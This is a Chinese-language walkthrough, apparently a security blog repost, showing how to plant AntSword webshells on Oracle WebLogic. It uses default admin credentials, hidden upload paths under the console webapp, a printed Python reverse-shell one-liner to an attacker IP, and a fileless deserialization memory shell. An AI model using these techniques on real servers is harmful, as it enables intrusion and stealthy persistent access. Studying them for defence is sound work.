Weblogic漏洞之中国蚁剑webshell利用

admin 2022年7月24日23:21:53评论585 views字数 1403阅读4分40秒阅读模式



网安引领时代,弥天点亮未来   





 

Weblogic漏洞之中国蚁剑webshell利用

0x00写在前面

本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!



Weblogic漏洞之中国蚁剑webshell利用

0x01实战演示

方法1

1.部署漏洞环境

http://10.211.55.2:31307/console/login/LoginForm.jsp

Weblogic漏洞之中国蚁剑webshell利用

2.通过默认密码登录后台部署war

账号:weblogic   密码:Oracle@123

3.可直接访问解析jsp文件,然后连接即可。


方法2

1.通过使用漏洞检测工具,判断目标是否存在漏洞。

Weblogic漏洞之中国蚁剑webshell利用

2.进行文件上传


路径1(root用户

/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war

上传蚁剑webshell

Weblogic漏洞之中国蚁剑webshell利用

上传成功,访问路径解析

http://10.211.55.2:31307/bea_wls_internal/mt.jsp

Weblogic漏洞之中国蚁剑webshell利用

中国蚁剑连接成功

Weblogic漏洞之中国蚁剑webshell利用


落地位置

Weblogic漏洞之中国蚁剑webshell利用


路径2(oracle用户

/u01/oracle/weblogic/wlserver/server/lib/consoleapp/webapp/images/im.jsp/u01/oracle/weblogic/wlserver/server/lib/consoleapp/webapp/css/css.jsp

为方便查看上传文件的具体情况,这里反弹一个反向shell


使用python方式反弹

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.211.55.7",12388));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'

nc监听获取shell


Weblogic漏洞之中国蚁剑webshell利用

上传蚁剑webshell

Weblogic漏洞之中国蚁剑webshell利用


Weblogic漏洞之中国蚁剑webshell利用

命令行查看

Weblogic漏洞之中国蚁剑webshell利用


Weblogic漏洞之中国蚁剑webshell利用

上传成功,访问路径解

http://10.211.55.2:23392/console/images/im.jsp

http://10.211.55.2:23392/console/css/css.jsp

Weblogic漏洞之中国蚁剑webshell利用


路径3(oracle用户

/u01/oracle/weblogic/wlserver/server/lib/consoleapp/webapp/framework/skins/wlsconsole/images/yz.jsp

上传蚁剑webshell

Weblogic漏洞之中国蚁剑webshell利用

命令行查看

Weblogic漏洞之中国蚁剑webshell利用

上传成功,访问路径解

http://10.211.55.2:23392/console/framework/skins/wlsconsole/images/yz.jsp

Weblogic漏洞之中国蚁剑webshell利用


最后,利用web logic反序列漏洞注入中国蚁剑Filter内存马(不落地)

Weblogic漏洞之中国蚁剑webshell利用

中国蚁剑成功连接

Weblogic漏洞之中国蚁剑webshell利用

文件管理无文件落地

Weblogic漏洞之中国蚁剑webshell利用



注意:不同环境的jdk差异上传后的文件解析存在不同的问题。条条大路通罗马,攻击利用可以多思路,骚操作,能到达出其不意的效果。




Weblogic漏洞之中国蚁剑webshell利用 


知识分享完了

喜欢别忘了关注我们哦~


学海浩茫,

予以风动,
必降弥天之润!


   弥  天

安全实验室

Weblogic漏洞之中国蚁剑webshell利用





原文始发于微信公众号(弥天安全实验室):Weblogic漏洞之中国蚁剑webshell利用

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月24日23:21:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Weblogic漏洞之中国蚁剑webshell利用http://cn-sec.com/archives/1196587.html

发表评论

匿名网友 填写信息